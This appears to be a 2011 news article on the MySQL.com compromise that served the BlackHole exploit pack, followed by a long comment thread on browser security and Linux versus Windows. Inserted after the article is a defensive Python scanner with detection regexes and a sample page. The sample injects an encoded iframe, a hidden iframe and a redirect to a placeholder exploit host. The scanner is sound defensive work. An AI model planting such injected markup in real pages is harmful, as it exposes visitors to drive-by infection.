Well, this is embarrassing. MySQL.com has been hacked (fixed by now), and was turned into a platform serving malware to unsuspecting visitors. The criminals did this by injecting a script which redirected visitors to a website which uses the BlackHole exploit pack, which probes the browser used and serves up an appropriate exploit. Computer security blogger Brian Krebs saw root access to MySQL.com being offered for $3000 only a few days ago.
Armorize was the first to detail how the exploit works – and in quite some detail, too, including code samples and such. Basically, a script redirects the visitor to a website which hosts a BlackHole exploit pack.
“[The BlackHole exploit pack] exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, …), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,” Armorize explains, “The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”
This piece of malware is only detected by a small number of security software packages (4 out of 44). What, exactly, the malware does is a mystery – and by that I mean a mystery to me, since nobody seems to mention what it does.
Interestingly enough, a few days ago, Krebs noted that on an exclusive Russian hacker forum, someone by the nickname of ‘sourcecode’ offered root access to MySQL.com, which is a very lucrative site to attack due to its 12 million visitors per month. The hacked version of MySQL.com was up for seven hours, meaning 12000 visitors were exposed to the BlackHole exploit pack.
“The ultimate irony of this attack is that the owner of mysql.com is Oracle Corp., which also owns Java, a software suite that I have often advised readers to avoid due to its numerous security and update problems,” Krebs notes, “As I’ve noted in several blog posts, Java exploits are the single most effective attacks used by exploit kits like BlackHole; currently, four out of nine of the exploits built into BlackHole attack Java vulnerabilities.”
Well, I need Java for Minecraft. So there.
In case you’re curious to see what happened when an unsuspecting user browsed to the compromised site, Armorize has posted a video showing what happened.
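To make the injection-then-redirect mechanism described above concrete from the defender's side, here is an added example (not code from the article, from Armorize or from MySQL.com) that scans a page's HTML for the tell-tale signs: script/iframe sources on a foreign host, inline scripts that set `location` to a foreign host, and `unescape()`-obfuscated markup, which it decodes one layer and rescans. The allowlist of hostnames, the sample pages and the `exploit-kit.invalid` placeholder domain are constructed assumptions.

```python
"""Heuristic scanner for injected redirect/exploit-kit loaders in HTML.

Added example, not from the article. ALLOWED_HOSTS and the sample pages
are constructed; ``exploit-kit.invalid`` is a placeholder, not a real IoC.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Hosts the site legitimately loads content from (assumed for the example).
ALLOWED_HOSTS = {"mysql.com", "www.mysql.com", "dev.mysql.com"}

# Inline assignment of a new location, e.g. window.location = "http://...".
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]")
# Common obfuscation markers: eval/unescape calls or long runs of %XX / \xXX escapes.
OBFUSCATION_RE = re.compile(
    r"eval\s*\(|unescape\s*\(|(?:%[0-9a-fA-F]{2}){8,}|(?:\\x[0-9a-fA-F]{2}){8,}")
# Literal string handed to unescape(); we decode it and scan the result.
UNESCAPE_RE = re.compile(r"unescape\s*\(\s*['\"]([^'\"]+)['\"]\s*\)")


class _Collector(HTMLParser):
    """Collects external resource references and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.refs = []        # (tag, src) for script/iframe/embed/object
        self.inline = []      # bodies of <script> elements without src
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe", "embed", "object") and a.get("src"):
            self.refs.append((tag, a["src"]))
        if tag == "script" and not a.get("src"):
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def _foreign(url):
    """True when the URL names a host that is not on the allowlist."""
    host = urlparse(url).hostname
    return host is not None and host.lower() not in ALLOWED_HOSTS


def scan_html(html):
    """Return a list of (kind, detail) findings for one page; [] means clean."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    findings = []
    for tag, src in parser.refs:
        if _foreign(src):
            findings.append(("external_" + tag, src))
    for body in parser.inline:
        for target in REDIRECT_RE.findall(body):
            if _foreign(target):
                findings.append(("inline_redirect", target))
        if OBFUSCATION_RE.search(body):
            findings.append(("obfuscated_script", body.strip()[:60]))
        # Peel one layer of unescape('%3C...') and scan the decoded markup too.
        for encoded in UNESCAPE_RE.findall(body):
            for kind, detail in scan_html(unquote(encoded)):
                findings.append(("decoded_" + kind, detail))
    return findings


# Constructed sample: a legitimate page with three injected elements.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script type="text/javascript">
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2Fexploit-kit.invalid/x%22%3E'));
</script>
</head><body>
<iframe src="http://exploit-kit.invalid/landing" width="1" height="1"></iframe>
<script>window.location = "http://exploit-kit.invalid/go";</script>
</body></html>"""

# Constructed sample with only first-party content.
CLEAN_PAGE = '<html><script src="/js/site.js"></script><script>var x = 1;</script></html>'

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:28s} {detail}")
```

Run it on a page fetched with `curl` and diff the findings against a known-good baseline; anything new that points off-site is what a compromise like this one looks like from the outside.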
Noscript for Firefox. Scripts should only be run on pages that require them, and I know for a fact the homepage of MySQL.com makes use of them but doesn’t require JavaScript to work. This is why, despite it being relatively slow and Mozilla’s insane versioning scheme, I stick with Firefox. I’ve not found another add-on for any browser that comes close to the usefulness of Noscript in preventing malware from getting at me.
Agreed!!
NoScript, FlashBlock, AdBlock, NoSquint, ImageZoom, SmartVideo, and Yahoo! Mail Checker make my browsing experience smooth, safe, and intelligent.
I routinely load up a dozen or so YouTube videos to watch, and so having SmartVideo load them at 240p, paused, is a great help! Very few videos deserve/need any more detail than that anyway 😉
–The loon
FlashBlock is an insecure way to block Flash and NoScript includes a secure way which can be enabled for trusted sites too, giving a FlashBlock-like experience (lack of a whitelist aside).
Aside from that, it sounds like we have similar opinions on things.
It’s not really hard to be safe without all those tools, particularly when you’re the kind of user who would seek out and install them (and if you aren’t, not much can help).
PS. And you probably didn’t even notice what helps to keep this site afloat?
Edited 2011-09-27 00:05 UTC
Just for a bit of anti-FUD: Firefox 7 is due for release today (27 September 2011). It is very probably the fastest browser available now, overtaking Chrome.
Rapid advancement such as this is made possible by Mozilla’s new upgrade policies and versioning scheme.
In benchmarks? In situations when it really matters (on slow, old machines), I still find current versions of Firefox and Chrome (or Opera) worlds apart.
Firefox 7 should be the fastest (overall) current browser on slow, old machines, when it really matters.
Speed improvements are due to reduced memory usage, faster startup and the new Azure graphics API, so no, not in javascript benchmarks but in real performance.
http://techpp.com/2011/08/09/firefox-7-leaner-faster-and-more-stabl…
“Though it’s been less than a month since Firefox 5 was released, we have started getting information about how Mozilla’s Firefox 7 will be much faster than Firefox 6, will use much less memory and will be less likely to crash. Its memory remains steady if you leave it running, and as you close tabs, memory is freed up.
The way in which Mozilla Firefox has used memory has changed over the years, improving from one version to another. Firefox 3, 3.5 and 3.6 were considerable enhancements over Firefox 2. But when Mozilla released Firefox 4, it kind of regressed, instead of improving, mainly due to a large number of new features and to JavaScript. To overcome the shortcomings, Mozilla aimed to improve Firefox’s speed and stability by reducing memory usage and started MemShrink. Since then, step-by-step progress has been made, and Firefox 7 is the first to benefit from MemShrink’s success.”
http://tech18.com/firefox-7-features.html
What is expected out of Firefox 7?
#1. New 2D Graphics API – Azure
#3. Faster Startup
#4. 30% Reduction in Memory Usage
Enjoy.
Edited 2011-09-27 01:00 UTC
So when will Firefox v20 be available, jeez…
/I actually do use firefox a lot, mainly for portability and plugins.
Possibly just before Chrome v42.
Why did firefox change to a similarly paced version numbering system? With Chrome, I don’t even pay attention to version changes, but with firefox updates and addon issues, it is hard not to. Maybe that’s just me, and I admit I use more addons in firefox than in chrome.
http://mashable.com/2011/08/26/mozilla-rapid-release-firefox/
Mozilla: “Now, Mozilla’s Chairman Mitchell Baker responds to the criticism in a blog post. She starts by acknowledging the problem: “There is work to be done to make the rapid release process smoother and hopefully more useful to more of our userbase”, she writes.
However, due to the rapidly changing nature of the Internet, Baker thinks it’s necessary for the browser to follow this breakneck pace. “If we want the browser to be the interface for the Internet, we need to make it more like the Internet. That means delivering capabilities when they are ready. That means a rapid release process. If we don’t do something like this the browser becomes a limiting factor in what the Internet can do”, she writes.
Baker’s end thoughts don’t leave much hope that the rapid release process will change in the near future. “There is no free lunch (…) I know that’s not a perfect answer, and it’s not a promise that we can meet everyone’s needs perfectly. Despite this, I believe the rapid release process is the right direction”, Baker writes.”
It is not as bad as the media beat-up would have it:
http://download.cnet.com/8301-2007_4-20093070-12/new-firefox-6-beli…
All add-ons hosted on addons.mozilla.org should update automatically and relatively painlessly.
Mozilla has also released the Jetpack SDK 1.1, which allows for addons written in the same way that Chrome does it.
http://news.softpedia.com/news/Mozilla-s-Add-on-SDK-1-1-for-Restart…
Because this is fairly new, and because it is not as powerful as the original XUL addons, most Firefox addons do not use the Jetpack SDK.
For people (mainly businesses) who do not want their browser “keeping pace with the Internet”, Mozilla is apparently proposing an “Extended Support Release” version, starting with Firefox 8.
http://news.cnet.com/8301-30685_3-20109245-264/mozilla-proposes-not…
PS: hey, look at that! Firefox v20 is apparently due 26th March 2013.
Edited 2011-09-27 04:41 UTC
You forgot to mention that JetPack has existed since 2009 and many extensions that have been created since then already use it.
It is mostly the older extensions that do not yet support it, but as mentioned above most can be rewritten to use JetPack. Mozilla recently added more functions to JetPack so many more/others can be rewritten.
Rewritten means it should be easy to change from the older extension model to the new.
Every version of firefox since 1.5 has claimed to fix the memory issues. Honestly, I wouldn’t notice them anymore, but that is probably because I have eight gigs of ram on my workstations, as opposed to the 512 mb I had when ff 1.5 was out. Those with less memory still claim to have the memory leak.
Most of the things you mention are just benchmarks (I didn’t say “javascript benchmarks”) – easy to obtain numbers many “enthusiasts” like to gloat about, but which don’t translate directly to end user experience (particularly when it really matters, on slow & old machines; mostly shunted by “enthusiasts” and devs)
Anyway, I gave it a few days on one slow “piece of junk” I keep around (~”desktop replacement” laptop with Celeron 1.4 of the generation derived from Pentium M or Core Duo; it was the laptop CPU when they really took off here a few years back, many people still have such machines – generally, continuing to use them as long as they function; and it isn’t RAM-starved while browsing, in any browser); yeah, I give each browser a minimum of few days, I’m typically weird like that.
Maybe memory usage improved, I don’t know (no browser is memory starved on the piece of junk in question anyway, when opening sane numbers of tabs); maybe it starts faster, I don’t care (every browser starts decently on this machine – and it’s irrelevant anyway, I don’t do it that often); those are benchmarks. Maybe it uses some new library in the back-end …why should I care about its name and what it claims to do? (Mozilla claims massive improvements every single time, at each release …well, after first few years of denying given problem, that is)
What’s important, is that there is little to no difference felt. Stuff like how the UI feels, how the application responds to user actions, even how the scroll feels. FF is still worlds apart from Chrome (or Opera), when it really matters, in usage.
But I imagine “enthusiasts” and devs don’t experience it much… (or are so enthusiastic about their darling to genuinely overlook such “details”)
(BTW, as far as I am concerned 3.x+ was a major disappointment from 2.x – maybe it looked better in benchmarks, but it felt much worse, kinda like they went outside sane tweaks, patterns for their codebase – characteristics of which certainly play a role, Webkit is used successfully in mobiles for quite some time, while Mozilla had few aborted attempts, openly saying “we’ll wait for hardware” …wasn’t “true OSS” supposed to be about retiring planned obsolescence and such?)
And Firefox breaks all my extensions that I use for Web Development every two weeks … Thanks Mozilla Team.
It shouldn’t. The majority of XUL extensions, and nearly all plugins, themes, search engines and Jetpack addons, will continue to run happily after an upgrade of Firefox.
Unless, that is, your extensions check the Firefox version and explicitly disable themselves after an upgrade.
If that is the case, you can thank the authors of the extension(s) that are giving you trouble, rather than thank the Mozilla Team.
Wouldn’t be a problem if Mozilla didn’t do this silly dev cycle, and btw it is Firefox that disables them after doing a compatibility check.
TBH I am not that impressed with any of the new Web browsers, there are more rendering bugs now to deal with cross browser and more annoying niggly bugs … and don’t even get me started with browser specific css extensions.
+1
Coincidentally, just today I encountered an attack site where Noscript would have saved my bacon, had I been running Windows. At this point I consider script blocking, or extensions providing it, an essential browser feature.
At this point I consider not running Windows an essential feature 😛
While I don’t use Windows and I’d be happy to see more people abandon the platform, right now I don’t think there’s a good alternative; there’s just too much software that’s only available for Windows.
(Really it’s kind of a catch-22. Software is available for Windows because it’s the most common desktop OS. But until people start migrating away from it, the software won’t be available for other OSes; and people won’t be quick to migrate away from it due to lack of available software. Yippee.)
Also, most Linux distros have sucky security by default. Just sayin’.
While particular products, such as for example Microsoft Office, are available only for Windows, the product type most certainly is not constrained to Windows. See LibreOffice, for example.
Now while some products are not 100% interchangeable, for the vast majority of uses they are.
The majority of people could happily run everything they needed on a platform other than Windows. Easily.
None of them are of good enough quality, except things which are already cross platform or they are dev tools … unless you are talking about the Macintosh.
Until I don’t ever have to fix anything on the terminal … it will not be good enough for consumers.
Edited 2011-09-27 12:00 UTC
Many of the FOSS desktop applications are significantly better than the equivalent proprietary offerings.
Examples:
This is the default plain text editor on my Linux distribution:
http://kate-editor.org/about-kate/
This is the default file manager:
http://dolphin.kde.org/features.html
This is the default document viewer:
http://okular.kde.org/formats.php
Compare these to the default on Windows 7 … Notepad, Windows explorer and nothing.
My desktop itself, KDE Plasma, has significantly better features than Windows 7.
http://en.wikipedia.org/wiki/KDE_Plasma_Workspaces#Features
An ordinary user doesn’t ever have to fix anything on the terminal.
http://commons.wikimedia.org/wiki/File:KDE_SC_4.5_System_Settings.p…
Edited 2011-09-27 12:44 UTC
Depends ultimately. Some are … some aren’t. However it is a matter of opinion and not a fact.
If they are using a text editor for saving something like a phone number, one does not need anything better than WordPad (which is installed by default).
They don’t need all the features of something like kate.
Normal users don’t use these extra features … I don’t even use half the features in Windows Explorer and I am a developer.
Adobe Reader is free and is pretty good, there is always foxit and quite a few others.
That is your opinion not mine. I personally think that KDE lacks a lot of graphic polish … things like spacings of text and window borders.
I don’t even use Alt Tab that often … most people don’t need or even know about lots of extra features … they just want to use something simple.
Having more features does not mean something is better
“Antoine de Saint-Exupery” said it better than I.
… Think about it for a second.
This is a downright lie. When something does go wrong (happens frequently … all one has to do is visit Ubuntu forums for evidence that this happens a lot).
The only way to fix it in Linux is by using the terminal and since with Linux distros core configuration files are kept in different places depending on distribution … looking for help on the web isn’t easy.
Edited 2011-09-27 13:20 UTC
Give up while you’re way behind. Every one of the apps he mentioned is unarguably better than the Windows equivalent. Your best argument against them is “most people don’t need a better product”.
In Linux you *can* fix problems on the command line; in Windows you *can not* fix problems on the command line. It’s not a bug, it’s a feature. Most of the time, editing the registry is the only way to fix a Windows problem, which is much more complex and less documented than any command line Linux fix.
No I am not saying that. What I am saying and what you guys don’t understand is that having more is not always better when designing user interfaces.
What you guys are doing is comparing Paint.NET to Photoshop.
Paint.NET is brilliant for editing photos and simple graphics, and has IMO a nice and easy to use interface. It is great for what it is meant to do.
Photoshop is overkill compared to Paint.NET for simple edits and takes longer to learn even simple stuff.
However Photoshop is the obvious choice for professional use and its position in the industry reflects this.
Same with Notepad and Explorer. For what they are intended to do, simple editing and file browsing, they work just fine.
In fact Dolphin’s original motivation (it came out 2004-2005) was to be a simpler alternative to what was KDE’s file browser at the time (which I believe was Konqueror).
If people need something more complicated there are solutions out there for people that need them such as kate.
Oh c’mon, we all know that statement is a bit of a joke.
Fixing problems on the CMD line, and registry hacking are both unacceptable IMO.
However registry hacks are really only needed when a system is really screwed (and a Reinstall is probably warranted).
I don’t think expecting a person (consumer) to use a *nix command line to solve system problems is acceptable. It just proves that usability for consumers isn’t baked into Linux, like it is for MacOSX and Windows. Which is fine … for people that don’t expect that level of integration. Which proves my point.
Edited 2011-09-27 15:49 UTC
Oh, come on. You really think kate or dolphin are too complex for people to use? No you don’t. That’s absurd. You just want to argue more.
Windows can develop really complex problems that I could fix via the command line in linux, but I can’t fix them because that isn’t exposed via command line in windows. Easy things should be easy, and complex things should be possible.
The original argument was that “KDE is soo much better because it can do all these things”.
My argument is that “While it can do more out of the box, this isn’t always the best measure of whether something is actually better.”
I explained my reasoning with the photoshop example.
Frequently on here people latch onto specifics … and miss the underlying point I was trying to make. Which is extremely frustrating …
I don’t want to argue … I want you guys to actually understand the point I am making.
Way to go and miss the whole point. This is fine for the likes of you and me.
The original argument was “(Desktop) Linux is good enough for most people” … mine was this isn’t true because people who don’t understand how to use a terminal will at some point be forced to use it and that is why I don’t think it is good enough.
Why is it that people are still saying things like this as though they haven’t been said thousands of times before in the past decade? It really misses the salient point, which had nothing to do with ease-of-use.
Windows simply had the necessary inertia and network-effect to short circuit the potential of any serious competitor. Linux was never ready for the masses as a Desktop O/S and much of the energy spent in that direction was a pointless diversion from the areas where it shines.
Arguing about Linux-on-the-desktop is even more boring than all of the recent licensing debates.
I absolutely agree.
I am fine with that … I use Icaros/OpenBSD as a Hobby OS on my own computers … however the OP continues to state the opposite as if it was fact and I take issue with that.
See, I’m here not arguing that Linux is a perfect replacement for windows for most users. I’m arguing that your reasons are not real reasons. [ ok maybe it was I that was arguing for the sake of arguing ]
The real reasons why it isn’t a good replacement have nothing to do with the command line; it has everything to do with app and hardware compatibility. What, in your opinion, is something that common users are forced to do on the command line that they can equivalently do through a GUI, or that automatically happens, in Windows?
Fair enough. I think my paint.net vs photoshop example was probably a better example, then say kate vs notepad … but we have been over that
Fedora FAQ
http://www.fedorafaq.org/
I think there are quite a good few example there IMO.
http://www.fedorafaq.org/#nvidia
(and before anyone jumps at me saying it is a closed source driver … I really don’t care … People expect their hardware to just work).
I appreciate it maybe different in other distributions … but it is an example.
Just setting up the repos at the start of the article is too much for say my step-mother or my brother.
I haven’t been using Linux recently enough to possibly comment. But I still see the same the complaints and problems that were present when I was an admin in 2007 …
Under Linux you also get a choice in regard to complexity. For example: Leafpad instead of Notepad, AbiWord instead of Wordpad.
http://www.makeuseof.com/tag/leafpad-ultralightweight-text-editor-l…
http://www.abisource.com/
In each case the Linux desktop program choice is better than the Windows close equivalent.
In each application area, the Linux default application is far better than the Windows default application.
For Photoshop replacements, perhaps use krita for actual painting (creation) of raster graphics, and digikam for photo editing.
http://krita.org
http://www.digikam.org
RedHat have more or less abandoned the desktop, it is not their focus.
Have a look at Ubuntu/Kubuntu, Mint, OpenSuse or Mandriva. No need to use the command line.
Apart from the fact that people are better off these days using the default (open source) drivers, for your example of the closed source drivers (if one insists) one can use jockey-kde for GUI-only installation of closed-source driver alternatives. Because the open source drivers will just work, and work well, it is perhaps not recommended to use closed source drivers. Having said that, still it is not forbidden either to use the closed-source drivers, and it certainly does not require the use of the command line.
For GUI package management, Muon is the new GUI package manager in Kubuntu.
Hint: To make a valid point, you need to argue against what the Linux desktop experience actually is, not your strawman disparagement of it.
Edited 2011-09-28 01:16 UTC
For anyone interested, here is a preview of the Muon Package Management Suite.
http://www.linuxbsdos.com/2011/09/26/muon-package-management-suite/
Even one’s step-mother or brother would have absolutely no trouble installing, managing and updating applications in Kubuntu 11.10 using Muon.
There is nothing available for Windows which comes anywhere close to matching this for a one-stop, easy to use method of searching for, installing, managing and updating applications.
No contest hands-down win for Linux on the desktop here.
Edited 2011-09-28 04:56 UTC
You always miss the point …
He didn’t miss the point. You’re missing the point, lucas.
I don’t think so.
1) He completely missed the point with Photoshop VS Paint.NET example.
2) Advised that I distro hop … So reinstall my whole OS, instead of actually having the underlying problem fixed in the first place (HINT: Stable driver ABI).
3) Advised that I should use under performing drivers so I don’t get the best out of my hardware.
4) Seems to think that Package manager is better than an installer for some reason. I left my fedora server off for 2 weeks … 600 updates …
If all Linux can offer is a “knock off” of Windows interface with Applications which are knock off of Windows application … Why should anyone choose Linux over the real thing.
Even the creator of Gnome has similar opinions.
http://www.pcpro.co.uk/news/370171/gnome-creator-linux-has-only-10-…
Edited 2011-09-28 14:27 UTC
Is that really the point? Or is the point that you, despite saying you’re an OpenBSD user, are especially touchy whenever anybody criticizes Windows. Why is that? Why would you care when you’re an OpenBSD guy?
Because most of the criticism is pretty much FUD … or some damn lies
http://tmrepository.com/trademarks/popular/
There are GUI package managers. So none of the yum commands apply as a valid example. I’m not sure why the FAQ has them. Except, perhaps because a GUI is not necessary in Fedora.
The Nvidia example doesn’t apply because it’s not necessary (the open source one works well enough) and it’s not an everyday command that ordinary people need to do. There *really* are not command line things that ordinary people *need* to use on a daily, weekly, monthly or even yearly basis. It’s an old canard, like saying Windows doesn’t multitask or isn’t stable.
Now the Nvidia example, while not a good command line usage requirement, is a good example of why Linux is not for everyone. The only real reason to install the proprietary graphics drivers is for better graphics performance, like for games and what not. There really aren’t many games for linux, and most popular windows games do not work, even with wine.
You don’t want to argue because the point you were trying to make is dead wrong.
This was what you said:
Utterly wrong.
My original point stands: “Now while some products are not 100% interchangeable, for the vast majority of uses they are. The majority of people could happily run everything they needed on a platform other than Windows. Easily.”
I’ll extend it further: For the vast majority of uses which ordinary people use their computer, the Linux desktop (particularly KDE4) is significantly superior to the Windows 7 desktop, by every measure.
“Every measure” would include: overall cost; speed/performance; security; ease of use; ease of maintenance; far less frequent need to reboot; lack of licensing and other permission, ownership and other legal issues; lack of adware, nagware, spyware, trialware and other annoyances; compatibility with hardware old and new; lack of obsolescence issues; ease of finding and installing new (and powerful) desktop applications; vastly reduced external threats against the system; and configurability and arrangement of the desktop itself.
I want you to actually understand the point I am making. To me, it doesn’t seem that difficult to grasp.
Funny then how often that argument is made in favor of Windows. It has more software, more features, more options and therefore it is better.
Windows isn’t exactly the poster-child for “simplicity is perfection”, quite the opposite.
And you don’t ever have to fix anything on Windows?
Seriously? If that level of perfectionism is what you want, then you’ll never find any kind of replacement.
As it is, Debian/Ubuntu+KDE is of equal or better stability than Windows, and you don’t have to touch the command line.
It’s really a matter of which distro you choose. Debian/Ubuntu are among the best right now, and you don’t need hand-holding for very long.
A number of years back there was a Redmond Desktop Linux (made by ex-Microsoftees) that at the time (2003) had a superb installer (better than any other Linux distro at the time), and needed no command-line support. I installed it to test it out and it was excellent. Sadly, it was also very limited as you couldn’t install a compiler (not available in their package management system), but it was otherwise on-par with Windows.
Editing the registry is a lot easier! Windows must have some sort of service specifically designed to stop programs from removing all the crap that they place in the registry. :wink
Joking aside, I rarely need to use the terminal to fix things in Ubuntu or Fedora; this really has become less of an issue in the last 3 years or so.
All operating systems have points of irritation.
So if we equate the use of the terminal to using regedit then Windows isn’t ready for consumers either.
That seems like a bit too narrow a market for an office suite.
Really? What makes you say that?
Ubuntu: five minute no-password timeout for sudo.
Mint: same, and no package signing.
Arch Linux: no package signing until recently.
Many, many distros: no mandatory access control system for sandboxing applications. Windows now has a mandatory access control system installed and enabled by default. One can of course set up a chroot on any distro, but AFAIK normal Linux chroots are not hard to break out of.
(Ubuntu, at least, has AppArmor and a profile for Firefox… But it doesn’t enable it by default.)
Neither of these magically make security better. In fact, both are overrated as security features. Does Windows MAC prevent malware, trojans or viruses? Real-world experience says no. A rooted system is not a big problem, lost user data and compromised privacy is.
I’m not saying Linux is necessarily better than Windows in this respect, though, but holding up Windows as a great champion of security because it has MAC is rather naive.
What does package signing give you? Yeah, the same site that distributes the packages assures you they’re the real thing. Too bad that will break down when the site is compromised.
FWIW I don’t hold Windows as a “champion of security.” And the reason I mentioned MAC is that it can protect the user’s data.
Can is not the same as does.
JavaScript is not the same as Java-Applet.
In Firefox you can just disable the Java-plugin, you’ll probably never need it.
I’ve never tried Minecraft, but I don’t think you run it in the browser, right?
Minecraft can be run as an applet or via a downloadable launcher JAR.
I use the JAR because the applet crashes the IcedTea (libre Java) browser plugin.
I think you’re being a little unfair to other browsers there: I know for a fact that Opera has this function built in and I’m pretty sure there’s similar Chrome extensions available too.
However flamewars aside, you do make a good point about browser security
Opera, as far as I can tell, does not have anything like Noscript built in. There is one extension and one userscript, but the extension is not very powerful and the userscript breaks many websites.
Chrome doesn’t either. There is the ScriptNo extension though, which seems to be fairly good.
(Chrome’s built-in script blocking doesn’t count – it does per-page blocking, not per-domain blocking.)
It does have it built in:
Settings -> quick preferences -> untick ‘enable javascript’
You can also enable/disable plug-ins too – which works just the same as Flash Block except it’s against ALL plug-ins (including Adobe PDF and Java Applets such as those used in this exploit)
I hadn’t said Chrome had any functionality built in. I said there are extensions available.
I’m so glad that I only visit non-FOSS websites… LOL.
Interestingly enough Oracle had just announced that MySQL was turning into an Open Core model, rather than staying as FOSS.
Another good reason to use PostgreSQL
It’s interesting that ClamAV was one of the first four security software packages that could detect this piece of malware
If you look at the VirusTotal report carefully, you’ll notice that none of the security programs actually “caught” the hack. 4 of 44 simply labeled it as “suspicious” which in regular-user terms means “false-positive”.
Sadly this is starting to look like the normal state of affairs. There seem to be whole categories of malware, e.g. fake antivirus trojans, that most AVs just don’t detect.
Furthermore, “realtime” antivirus protection is often a joke in my experience. I’ve seen computers get infected straight through it with big-name antiviruses like Norton and McAfee.
I figure this is the reason Microsoft decided to implement UAC… Which would probably be quite effective, if everyone and their sister didn’t turn it off!
IE9 by default blocks cross-site scripting, and also by turning on “Tracking Protection” you are more secure!! Firefox & Chrome should adopt this feature.
XSS blocking != wholesale Javascript blocking. Though last I checked it is possible to get Noscript-like functionality on IE using Proxomitron.
(And IIRC Chrome does include some measures against XSS, just not as many as Noscript.)
IE 8 and 9 are sandboxed on Windows Vista and 7 though, if you enable UAC. Not sure how effective that would be in this case. I personally wouldn’t know, since I never use IE – I find the user interface annoying.
“The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”
Is this a Windows only exploit?
Yes. It was shown in the video embedded within this article.
Can you please refrain from making this yet another linux vs. Windows whine-fest? Just accept that you have a tiny penis and move on with your life.